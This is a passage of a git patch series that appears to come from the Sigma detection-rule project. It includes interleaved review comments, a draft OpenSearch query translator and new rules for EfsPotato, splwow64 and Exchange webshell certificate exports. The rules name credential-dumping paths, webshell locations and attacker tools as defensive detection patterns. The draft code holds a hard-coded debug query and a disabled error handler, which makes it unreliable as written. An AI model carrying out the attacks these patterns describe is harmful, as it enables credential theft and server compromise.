+++ b/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml @@ -19,12 +19,12 @@ tags: - attack.credential_access - attack.execution - attack.t1003.001 - - attack.t1003 #an old one + - attack.t1003 # an old one - attack.t1059.001 - - attack.t1086 #an old one + - attack.t1086 # an old one - attack.lateral_movement - attack.t1021.006 - - attack.t1028 #an old one + - attack.t1028 # an old one - attack.s0002 falsepositives: - low diff --git a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml index 4b9294d8..bce196ae 100644 --- a/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/win_bad_opsec_sacrificial_processes.yml @@ -9,7 +9,7 @@ references: - https://www.cobaltstrike.com/help-opsec tags: - attack.defense_evasion - - attack.t1085 # legacy + - attack.t1085 # an old one - attack.t1218.011 logsource: category: process_creation diff --git a/rules/windows/process_creation/win_credential_access_via_password_filter.yml b/rules/windows/process_creation/win_credential_access_via_password_filter.yml index 2fda0365..c67033c1 100644 --- a/rules/windows/process_creation/win_credential_access_via_password_filter.yml +++ b/rules/windows/process_creation/win_credential_access_via_password_filter.yml @@ -10,7 +10,8 @@ references: - https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter tags: - attack.credential_access - - attack.t1174 + - attack.t1174 # an old one + - attack.t1556.002 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml index c603644e..44705724 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml +++ b/rules/windows/process_creation/win_lolbas_execution_of_wuauclt.yml 
@@ -10,7 +10,8 @@ modified: 2021/06/11 tags: - attack.defense_evasion - attack.execution - - attack.t1085 + - attack.t1085 # an old one + - attack.t1218.011 logsource: product: windows category: process_creation @@ -26,4 +27,4 @@ falsepositives: - Wuaueng.dll which is a module belonging to Microsoft Windows Update. fields: - CommandLine -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml index 05ee03d5..7b146ad2 100644 --- a/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml +++ b/rules/windows/process_creation/win_modif_of_services_for_via_commandline.yml @@ -6,8 +6,10 @@ references: status: experimental tags: - attack.persistence - - attack.t1031 - - attack.t1058 + - attack.t1031 # an old one + - attack.t1543.003 + - attack.t1058 # an old one + - attack.t1574.011 author: Sreeman date: 2020/09/29 modified: 2021/08/10 diff --git a/rules/windows/process_creation/win_powershell_disable_windef_av.yml b/rules/windows/process_creation/win_powershell_disable_windef_av.yml index ebfb84ed..4d507255 100644 --- a/rules/windows/process_creation/win_powershell_disable_windef_av.yml +++ b/rules/windows/process_creation/win_powershell_disable_windef_av.yml @@ -11,7 +11,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md tags: - attack.defense_evasion - - attack.t1089 # legacy + - attack.t1089 # an old one - attack.t1562.001 logsource: category: process_creation diff --git a/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml b/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml index b044d26e..06cee06a 100644 --- a/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml +++ b/rules/windows/process_creation/win_powershell_reverse_shell_connection.yml 
@@ -10,8 +10,8 @@ date: 2021/03/03 modified: 2021/06/27 tags: - attack.execution - - attack.t1086 - - attack.t1059.005 + - attack.t1086 # an old one + - attack.t1059.001 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml index 328318d1..715dfc75 100644 --- a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml +++ b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml @@ -9,7 +9,8 @@ date: 2020/18/02 modified: 2021/06/11 author: Sreeman tags: - - attack.t1015 + - attack.t1015 # an old one + - attack.t1546.008 - attack.privilege_escalation logsource: product: windows @@ -24,4 +25,4 @@ fields: - ParentProcess falsepositives: - Unknown -level: medium \ No newline at end of file +level: medium diff --git a/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml b/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml index 198851a1..11c66ddb 100644 --- a/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml +++ b/rules/windows/process_creation/win_susp_shell_spawn_from_mssql.yml @@ -6,7 +6,8 @@ author: FPT.EagleEye Team, wagga date: 2020/12/11 modified: 2021/06/27 tags: - - attack.t1100 + - attack.t1100 # an old one + - attack.t1505.003 - attack.t1190 - attack.initial_access - attack.persistence diff --git a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml index 2ede1d70..34447d11 100755 --- a/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml +++ b/rules/windows/registry_event/sysmon_registry_persistence_key_linking.yml 
@@ -9,7 +9,8 @@ date: 2019/10/23 modified: 2019/11/07 tags: - attack.persistence - - attack.t1122 + - attack.t1122 # an old one + - attack.t1546.015 logsource: category: registry_event product: windows From 9b30b487c3be60105202bd695ca90314e30f6495 Mon Sep 17 00:00:00 2001 From: Yugoslavskiy Daniil Date: Mon, 23 Aug 2021 04:25:29 +0200 Subject: [PATCH 0497/1367] add ATC to the Projects or Products that use Sigma section --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 864235a6..4815056d 100644 --- a/README.md +++ b/README.md @@ -318,6 +318,7 @@ These tools are not part of the main toolchain and maintained separately by thei # Projects or Products that use Sigma * [MISP](http://www.misp-project.org/2017/03/26/MISP.2.4.70.released.html) (since version 2.4.70, March 2017) +* [Atomic Threat Coverage](https://github.com/atc-project/atomic-threat-coverage) (since December 2018) * [SOC Prime - Sigma Rule Editor](https://tdm.socprime.com/sigma/) * [uncoder.io](https://uncoder.io/) - Online Translator for SIEM Searches * [THOR](https://www.nextron-systems.com/2018/06/28/spark-applies-sigma-rules-in-eventlog-scan/) - Scan with Sigma rules on endpoints From f51c46243906bbc62029343df9d2921586cb35df Mon Sep 17 00:00:00 2001 From: Young Date: Sun, 22 Aug 2021 21:58:04 -0700 Subject: [PATCH 0498/1367] finished building and translating AST, asupporting nested queries --- tools/osMonitor.json | 2 +- tools/sigma/backends/opensearch.py | 276 +++++++++++++++++++---------- tools/sigma/sigmac.py | 14 +- 3 files changed, 190 insertions(+), 102 deletions(-) diff --git a/tools/osMonitor.json b/tools/osMonitor.json index 04ff119a..f6839a71 100644 --- a/tools/osMonitor.json +++ b/tools/osMonitor.json 
@@ -1 +1 @@ -{"description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", "enabled": true, "false_positives": ["Software installation", "Software updates"], "filters": [], "from": "now-360s", "immutable": false, "index": ["winlogbeat-*"], "interval": "5m", "rule_id": "b0d77106-7bb0-41fe-bd94-d1752164d066", "language": "lucene", "output_index": ".siem-signals-default", "max_signals": 100, "risk_score": 5, "name": "Rare Schtasks Creations", "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4698\")", "meta": {"from": "1m"}, "severity": "low", "tags": ["Execution", "Privilege Escalation", "Persistence", "T1053", "T1053.005"], "to": "now", "type": "threshold", "threat": [{"tactic": {"id": "TA0002", "reference": "https://attack.mitre.org/tactics/TA0002", "name": "Execution"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0004", "reference": "https://attack.mitre.org/tactics/TA0004", "name": "Privilege Escalation"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}, {"tactic": {"id": "TA0003", "reference": "https://attack.mitre.org/tactics/TA0003", "name": "Persistence"}, "framework": "MITRE ATT&CK\u00ae", "technique": [{"id": "T1053", "name": "Scheduled Task/Job", "reference": "https://attack.mitre.org/techniques/T1053"}]}], "version": 1, "threshold": {"field": "winlog.event_data.TaskName", "value": 6}} +{"type": "monitor", "name": "RDP over Reverse SSH Tunnel WFP", "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", "enabled": true, "schedule": {"period": {"interval": 5, "unit": "MINUTES"}}, "inputs": [{"search": {"indices": ["opensearch-security-logs"], 
"query": {"size": 1, "aggregations": {}, "query": {"bool": {"should": [{"bool": {"must": [{"match": {"winlog.channel": "\"System\""}}, {"match": {"winlog.event_id": "\"16\""}}]}}, {"bool": {"should": [{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}, {"match": {"winlog.event_data.HiveName.keyword": "*.dmp"}}]}}]}}}}}], "tags": ["Defense Evasion", "Lateral Movement", "T1090", "T1090.001", "T1090.002", "T1021.001"], "triggers": [{"name": "generated-trigger", "severity": "2", "condition": {"script": {"source": "ctx.results[0].hits.total.value > 0", "lang": "painless"}}, "actions": []}], "sigma_meta_data": {"rule_id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "threat": [{"tactic": {"id": "TA0005", "reference": "https://attack.mitre.org/tactics/TA0005", "name": "Defense Evasion"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}, {"tactic": {"id": "TA0008", "reference": "https://attack.mitre.org/tactics/TA0008", "name": "Lateral Movement"}, "framework": "MITRE ATT&CK\u00ae", "technique": []}]}, "references": ["https://twitter.com/SBousseaden/status/1096148422984384514", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx"]} diff --git a/tools/sigma/backends/opensearch.py b/tools/sigma/backends/opensearch.py index 1e034800..73d3362f 100644 --- a/tools/sigma/backends/opensearch.py +++ b/tools/sigma/backends/opensearch.py 
@@ -40,58 +40,214 @@ class Atom: def __init__(self, field: str, prop: str) -> None: self.field = field self.prop = prop + def __str__(self) -> str: + return "Atom( {}, {} )".format(self.field.replace("\\\\", "\\"), self.prop.replace("\\\\", "\\")) +# Root of AST is always a Group class Group: - def __init__(self) -> None: - pass + def __init__(self) -> None: + pass + def __str__(self) -> str: + return "Group( {} )".format(str(self.ary).replace("\\\\", "\\")) class Boolean: def __init__(self, expression: Union[Atom, Group]) -> None: self.expression = expression + def __str__(self) -> str: + return "Boolean( {} )".format(str(self.expression).replace("\\\\", "\\")) class Ary: def __init__(self, bool1: Boolean, bool2: List[Tuple[str, Boolean]] = None) -> None: self.bool1 = bool1 self.bool2 = bool2 + def __str__(self) -> str: + return "Ary( {}, {} )".format(str(self.bool1).replace("\\\\", "\\"), [(rel, str(boolean).replace("\\\\", "\\")) for rel, boolean in self.bool2]) -def group_init(self, ary:Ary): +def group_init(self, ary: Ary): self.ary = ary Group.__init__ = group_init -def parseAtom(s: str) -> Atom: - return Atom(s.split(":")[0], s.split(":")[0]) +def parse_atom(s: str) -> Atom: + reg = r"(? Group: - return Group(parseAry(s[1:-1])) +# Since root of AST is always a Group, call parse_group to initiate parsing of overall expression +def parse_group(s: str) -> Group: + return Group(parse_ary(s[1:-1])) -def expandGroup(s: str) -> str: - field = s.strip("()").split(":")[0] - props = s.strip("()").split(":")[1].strip("()").split() - print(props) +def expand_group(s: str) -> str: + reg = r"(? 
Boolean: - if not s.contains("("): - expression = parseAtom(s) +def parse_boolean(s: str) -> Boolean: + if "(" not in s: + expression = parse_atom(s) else: if s[0] != '(': - s = expandGroup(s) - expression = parseGroup(s) + s = expand_group(s) + expression = parse_group(s) return Boolean(expression) -def parseAry(s: str) -> Ary: - pass +def parse_ary(s: str) -> Ary: + lst = [] + left = right = level = 0 + + while left < len(s): + # Going down one level + if right < len(s) and s[right] == '(': + level += 1 + + # Going up one level + elif right < len(s) and s[right] == ')': + level -= 1 + + # s[left:right] is parse-able + elif right == len(s) or (s[right] == ' ' and level == 0): + section = s[left:right] + + # Handle Boolean case + if section not in ["AND", "OR"]: + section = parse_boolean(section) + + lst.append(section) + left = right + 1 + + right += 1 + + # [Bool, Rel, Bool, Rel, Bool,...] => Bool, [(Rel, Bool), (Rel, Bool),...] + bool1 = lst[0] + bool2 = [] + + for i in range(1, len(lst), 2): + tupe = (lst[i], lst[i + 1]) + bool2.append(tupe) + + return Ary(bool1, bool2) + +def translate_atom(atom: Atom) -> dict: + return { + "match": { + atom.field: atom.prop + } + } + +def translate_group(group: Group) -> dict: + return translate_ary(group.ary) + +def translate_boolean(boolean: Boolean) -> dict: + if type(boolean.expression) is Atom: + return translate_atom(boolean.expression) + + return translate_group(boolean.expression) + +# Combining ary.bool1 and ary.bool2 into array of Boolean grouped by ANDs and split by ORs +def convert_bool_array(bool1: Boolean, boolArr: List[Tuple[str, Boolean]]) -> List[List[Boolean]]: + result = [[bool1]] + resultIndex = 0 + + for rel, boolean in boolArr: + if rel == "AND": + if resultIndex == len(result): + result.append([boolean]) + else: + result[resultIndex].append(boolean) + else: + resultIndex += 2 + result.append([boolean]) + + return result + +def adjust_matches(matches: List[dict]) -> List[dict]: + for index in 
range(len(matches)): + match = matches[index] + if "match" in match.keys(): + matches[index] = { + "bool": { + "must": [match] + } + } + return matches + +def contains_group(booleanArr: List[Boolean]) -> bool: + for boolean in booleanArr: + if type(boolean.expression) is Group: + return True + + return False + +def translate_ary(ary: Ary) -> dict: + parsedTranslation = convert_bool_array(ary.bool1, ary.bool2) + # print(f'ParsedTranslation: {parsedTranslation}') + + clauses = [] + + translateIndex = 0 + while translateIndex < len(parsedTranslation): + parsedExpression = parsedTranslation[translateIndex] + currMatches = [] + clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements + + # Statement was joined by "or" + if len(parsedExpression) == 1: + counter = 1 + tempIndex = translateIndex + while tempIndex+1 < len(parsedTranslation) and len(parsedTranslation[tempIndex+1]) == 1: + tempIndex += 1 + counter += 1 + + # If there's more than one, use "should" clase instead of "must" + if counter > 1: + clause = "should" + parsedExpression = [] + + # Rebuild parsed expression to join statements together and fast forward the translate index + for i in range(counter): + parsedExpression += parsedTranslation[translateIndex+i] + + translateIndex = tempIndex + + # Iterate through each statement and join match statements into array + for boolean in parsedExpression: + # print(f'Boolean: {boolean}\nCurrMatches: {currMatches}\n') + currMatches.append(translate_boolean(boolean)) + + if contains_group(parsedExpression): + print(f"\nContains Group; currMatches: {currMatches}\n") + currMatches = adjust_matches(currMatches) + + currQuery = { + "bool": { + clause: currMatches + } + } + + # print(f'\nCurrQuery: {currQuery}') + + clauses.append(currQuery) + translateIndex += 1 + + # If only one type of clause, don't use nested bool object + if len(clauses) > 1: + return { + "bool": { + "should": clauses + } + } + return clauses[0] class 
OpenSearchBackend(object): """OpenSearch detection rule backend.""" 
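Review bot: `translate_atom` emits a `match` query for every atom, so values that carry Lucene wildcards reach OpenSearch as literal text — the committed `osMonitor.json` in this same patch shows `{"match": {"winlog.event_data.HiveName.keyword": "*\\\\AppData\\\\Local\\\\Temp\\\\SAM*"}}`, which cannot match anything, so such rules silently never fire; wildcard-bearing values need a `wildcard` query (sketch below; a helper that honours escaped `\*` is preferable to the minimal test shown). The quoted values (`"\"System\""`) likewise carry their quote characters into the `match` value, which presumably only works against analyzed text fields — confirm for keyword mappings. `Ary.__str__` iterates `self.bool2` although the constructor defaults it to `None`, and `parse_ary` indexes `lst[0]` / `lst[i + 1]` without checking for an empty or odd-length list, so both raise on edge inputs. The `print(f"\nContains Group; currMatches: ...")` in `translate_ary` is debug output in library code and should go or become a logger call, and `group_init` monkey-patching `Group.__init__` can be replaced by a forward-reference annotation `ary: 'Ary'` in the class body.
```python
def translate_atom(atom: Atom) -> dict:
    # A match query treats '*' and '?' as literal text; only a wildcard query
    # interprets them.  Minimal test — refine to ignore escaped '\*' / '\?'.
    if "*" in atom.prop or "?" in atom.prop:
        return {"wildcard": {atom.field: atom.prop}}
    return {"match": {atom.field: atom.prop}}
```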
@@ -229,80 +385,12 @@ class OpenSearchBackend(object): ''' def build_query(self, translation): # print(f'\nparsed translation: {translation.strip("()").split("OR")}\n') - translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" AND winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* AND winlog.event_data.HiveName.keyword:*.dmp)" - # translation = "(winlog.channel:\"System\"" - parsedTranslation = translation.strip("()").split("OR") + translation = "(winlog.channel:\"System\" AND winlog.event_id:\"16\" OR winlog.event_data.HiveName.keyword:*\\\\AppData\\\\Local\\\\Temp\\\\SAM* OR winlog.event_data.HiveName.keyword:*.dmp)" + # translation = '(winlog.event_id:"5156" AND (winlog.event_data.SourcePort:"3389" AND winlog.event_data.DestAddress.keyword:(127.* OR \:\:1)))' - print(f'\nExpanded group: {expandGroup("winlog.event_data.DestAddress.keyword:(127.* OR 121)")}\n') - - if len(parsedTranslation) == 0: - return {} - - clauses = [] - - translateIndex = 0 - while translateIndex < len(parsedTranslation): - expression = parsedTranslation[translateIndex] - currMatches = [] - clause = "must" # default clause is "must"; clause is "should" if multiple "or" statements - - parsedExpression = expression.split() - - # Statement was joined by "or" - if len(parsedExpression) == 1: - counter = 1 - tempIndex = translateIndex - while tempIndex+1 < len(parsedTranslation) and len(parsedTranslation[tempIndex+1].split()) == 1: - tempIndex += 1 - counter += 1 - - # If there's more than one, use "should" clase instead of "must" - if counter > 1: - clause = "should" - parsedExpression = [] - - # Rebuild parsed expression to join statements together and fast forward the translate index - for i in range(counter): - parsedExpression.append(parsedTranslation[translateIndex+i]) - parsedExpression.append(None) - - translateIndex = tempIndex - - # Iterate through each statement and join match statements into array - for expressionIndex in range(0, 
len(parsedExpression), 2): - element = parsedExpression[expressionIndex] - currMatches.append({ - "match": { - element.split(":")[0]: element.split(":")[1] - } - }) - - currQuery = { - "bool": { - clause: currMatches - } - } - - clauses.append(currQuery) - translateIndex += 1 - - # If only one type of clause, don't use nested bool object - if len(clauses) > 1: - if self.isThreshold: - self.isThreshold = False - return { - "bool": { - "should": clauses, - "filter": self.rule_threshold - } - } - else: - return { - "bool": { - "should": clauses - } - } - return clauses[0] + ast = parse_group(translation) + print("\nAST: " + str(ast) + "\n") + return translate_group(ast) ''' Builds inputs field of OS monitor. diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 7bbeaeb0..4ba2f840 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -323,13 +323,13 @@ def main(): error = ERR_BACKEND if not cmdargs.defer_abort: sys.exit(error) - except (NotImplementedError, TypeError) as e: - print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) - print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr) - if not cmdargs.ignore_backend_errors: - error = ERR_NOT_IMPLEMENTED - if not cmdargs.defer_abort: - sys.exit(error) + # except (NotImplementedError, TypeError) as e: + # print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) + # print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr) + # if not cmdargs.ignore_backend_errors: + # error = ERR_NOT_IMPLEMENTED + # if not cmdargs.defer_abort: + # sys.exit(error) except PartialMatchError as e: print("Error: Partial field match error: %s" % str(e), file=sys.stderr) if not cmdargs.ignore_backend_errors: 
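Review bot: The `translation` argument of `build_query` is overwritten by a hard-coded sample string on the first added line of the hunk, so every rule compiled through this backend yields the query for that one sample rather than its own detection; that assignment and the `print("\nAST: " ...)` debug line need to go before merge, leaving `ast = parse_group(translation)` / `return translate_group(ast)`. The rewrite also drops the `isThreshold`/`self.rule_threshold` branch that the removed code attached as a `filter` clause, so threshold rules silently lose their aggregation; if that is intended it should be stated in the commit message. `parse_group` and `translate_group` are not defined within the visible hunk, so I cannot confirm they cover the grouping the removed code handled.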
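Review bot: Commenting out the `except (NotImplementedError, TypeError)` handler in `main` means an unsupported rule feature now escapes as an uncaught traceback instead of the controlled `ERR_NOT_IMPLEMENTED` exit, and `--ignore-backend-errors` / `--defer-abort` no longer apply to that case. If the goal is to see the new backend's `TypeError`s while debugging, re-raise under a debug flag inside the handler rather than deleting it; at minimum the handler should be restored before this lands. The enclosing `try` opens before this hunk, so the other `except` arms are not visible here.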
From dc3ed771b52a54ed2a82d3e524ece52becd824b1 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 08:32:50 +0200 Subject: [PATCH 0499/1367] rule: EfsPotato Named Pipe --- .../sysmon_efspotato_namedpipe.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml diff --git a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml new file mode 100644 index 00000000..b80687c1 --- /dev/null +++ b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml @@ -0,0 +1,24 @@ +title: EfsPotato Named Pipe +id: 637f689e-b4a5-4a86-be0e-0100a0a33ba2 +status: experimental +description: Detects the pattern of a pipe name as used by the tool EfsPotato +references: + - https://twitter.com/SBousseaden/status/1429530155291193354?s=20 + - https://github.com/zcgonvh/EfsPotato +date: 2021/08/23 +author: Florian Roth +logsource: + product: windows + category: pipe_created + definition: 'Note that you have to configure logging for PipeEvents in Sysmon config' +detection: + selection: + PipeName|contains: '\pipe\' + condition: selection +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1055 +falsepositives: + - Unknown +level: critical From a0f72e5f6f5c2d6bd6a45e03d57e52d6358c4ce2 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 10:41:42 +0200 Subject: [PATCH 0500/1367] rule: suspicious splwow64 process starts --- .../process_creation/win_susp_splwow64.yml | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_splwow64.yml diff --git a/rules/windows/process_creation/win_susp_splwow64.yml b/rules/windows/process_creation/win_susp_splwow64.yml new file mode 100644 index 00000000..3695fcec --- /dev/null +++ b/rules/windows/process_creation/win_susp_splwow64.yml 
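Review bot: `PipeName|contains: '\pipe\'` matches essentially every Sysmon pipe event, since every pipe name carries that prefix, so this `level: critical` rule fires on all pipe creations rather than on the EfsPotato pattern the description promises. The selection needs the distinctive pipe name the referenced tool uses (taken from the linked repository) rather than the generic prefix, and `level` should be hedged until that is confirmed. The `attack.t1055` tag (process injection) also looks mismatched for a named-pipe privilege-escalation tool; verify against the reference before keeping it.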
@@ -0,0 +1,20 @@
+title: Suspicious Splwow64 Without Params
+id: 1f1a8509-2cbb-44f5-8751-8e1571518ce2
+status: experimental
+description: Detects suspicious Splwow64.exe process without any command line parameters
+references:
+ - https://twitter.com/sbousseaden/status/1429401053229891590?s=12
+author: Florian Roth
+date: 2021/08/23
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\splwow64.exe'
+ filter:
+ CommandLine|contains: 'splwow64.exe '
+ condition: selection and not filter
+falsepositives:
+ - Unknown
+level: high
From 82dde594d1d206289dfb479c9e788f8875e539dd Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Mon, 23 Aug 2021 11:17:10 +0200 Subject: [PATCH 0501/1367] feat: Add rule for malicious CSR export on Exchange --- ...ange_proxyshell_certificate_generation.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/other/win_exchange_proxyshell_certificate_generation.yml
diff --git a/rules/windows/other/win_exchange_proxyshell_certificate_generation.yml b/rules/windows/other/win_exchange_proxyshell_certificate_generation.yml
new file mode 100644
index 00000000..003bdd72
--- /dev/null
+++ b/rules/windows/other/win_exchange_proxyshell_certificate_generation.yml
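Review bot: The filter `CommandLine|contains: 'splwow64.exe '` depends on a literal space directly after the executable name, so a quoted launch such as `"C:\Windows\splwow64.exe" 8192` is not filtered and the rule fires on exactly the parameterised case the description treats as benign. Expressing the positive condition instead of the negation is more robust, e.g. `CommandLine|endswith:` with both `'splwow64.exe'` and `'splwow64.exe"'` as the selection, dropping the filter. A `tags` section is also missing, unlike the neighbouring rules.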
@@ -0,0 +1,29 @@
+title: Certificate Request Export to Exchange Webserver
+id: b7bc7038-638b-4ffd-880c-292c692209ef
+status: experimental
+description: Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
+references:
+ - https://twitter.com/GossiTheDog/status/1429175908905127938
+author: Max Altgelt
+date: 2021/08/23
+logsource:
+ service: msexchange-management
+ product: windows
+detection:
+ export_command:
+ - 'New-ExchangeCertificate'
+ - ' -GenerateRequest'
+ - ' -BinaryEncoded'
+ - ' -RequestFile'
+ export_params:
+ - '\\\\localhost\\C$'
+ - '\\\\127.0.0.1\\C$'
+ - 'C:\\inetpub'
+ - '.aspx'
+ condition: all of export_command and export_params
+falsepositives:
+ - unlikely
+level: critical
+tags:
+ - attack.persistence
+ - attack.t1505.003
From 33c6ff6b5f4af8a416cf183074fe0f528c477328 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 23 Aug 2021 13:17:35 +0200 Subject: [PATCH 0502/1367] add powershell_suspicious_win32_pnpentity --- ...m_env.yml => powershell_detect_vm_env.yml} | 0 .../powershell_suspicious_win32_pnpentity.yml | 23 +++++++++++++++++++ 2 files changed, 23 insertions(+) rename rules/windows/powershell/{poweshell_detect_vm_env.yml => powershell_detect_vm_env.yml} (100%) create mode 100644 rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml
diff --git a/rules/windows/powershell/poweshell_detect_vm_env.yml b/rules/windows/powershell/powershell_detect_vm_env.yml
similarity index 100%
rename from rules/windows/powershell/poweshell_detect_vm_env.yml
rename to rules/windows/powershell/powershell_detect_vm_env.yml
diff --git a/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml b/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml
new file mode 100644
index 00000000..3cf7777d
--- /dev/null
+++ b/rules/windows/powershell/powershell_suspicious_win32_pnpentity.yml
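Review bot: `export_params` only recognises `C$` and `C:\inetpub`, so a request file written via `\\localhost\D$\...` on an Exchange server installed on another drive is missed unless the name happens to end in `.aspx`; matching the UNC prefix without the drive letter (`'\\\\localhost\\'`, `'\\\\127.0.0.1\\'`) keeps the intent while closing that gap. `condition: all of export_command and export_params` relies on the backend treating `all of` on a keyword list as an AND of its members — worth a comment, since `-GenerateRequest` and `-RequestFile` are also normal for a legitimate CSR and the rule only becomes specific through the path check. `service: msexchange-management` is an uncommon logsource; confirm a field mapping exists for it before `level: critical` is relied upon.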
@@ -0,0 +1,23 @@ +title: Powershell Suspicious Win32_PnPEntity +id: b26647de-4feb-4283-af6b-6117661283c5 +status: experimental +author: frack113 +date: 2021/08/23 +description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md +tags: + - attack.discovery + - attack.t1120 +logsource: + product: windows + service: powershell + definition: EnableScriptBlockLogging must be set to enable +detection: + selection: + EventID: 4104 + ScriptBlockText|contains: Win32_PnPEntity + condition: selection +falsepositives: + - admin script +level: low \ No newline at end of file From 25072e37b393bf2d6726034744b66e973f451d76 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 23 Aug 2021 13:30:46 +0200 Subject: [PATCH 0503/1367] update references --- rules/windows/process_creation/win_possible_applocker_bypass.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_possible_applocker_bypass.yml b/rules/windows/process_creation/win_possible_applocker_bypass.yml index 39ac4e71..6ebbdd45 100644 --- a/rules/windows/process_creation/win_possible_applocker_bypass.yml +++ b/rules/windows/process_creation/win_possible_applocker_bypass.yml @@ -5,6 +5,7 @@ status: experimental references: - https://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md author: juju4 date: 2019/01/16 modified: 2020/09/01 From 45f30cb2b43a9d3a419eab6b6df85116838a7003 Mon Sep 17 00:00:00 2001 
From: SomeOne Date: Mon, 23 Aug 2021 15:00:07 +0200 Subject: [PATCH 0504/1367] Add fields to event log cleared --- rules/windows/builtin/win_event_log_cleared.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index 649d0d95..969f0630 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -18,6 +18,9 @@ detection: EventID: 1102 condition: selection fields: - - fields in the log source that are important to investigate further + - logon_id + - src_user + - src_user_id + - src_nt_domain falsepositives: - Legitimate administrative activity From 91b42f9077d11e202387beda5f3632251ba77d93 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 23 Aug 2021 15:03:59 +0200 Subject: [PATCH 0505/1367] fix: indentation --- .../pipe_created/sysmon_efspotato_namedpipe.yml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml index b80687c1..9d444f88 100644 --- a/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml +++ b/rules/windows/pipe_created/sysmon_efspotato_namedpipe.yml @@ -3,8 +3,8 @@ id: 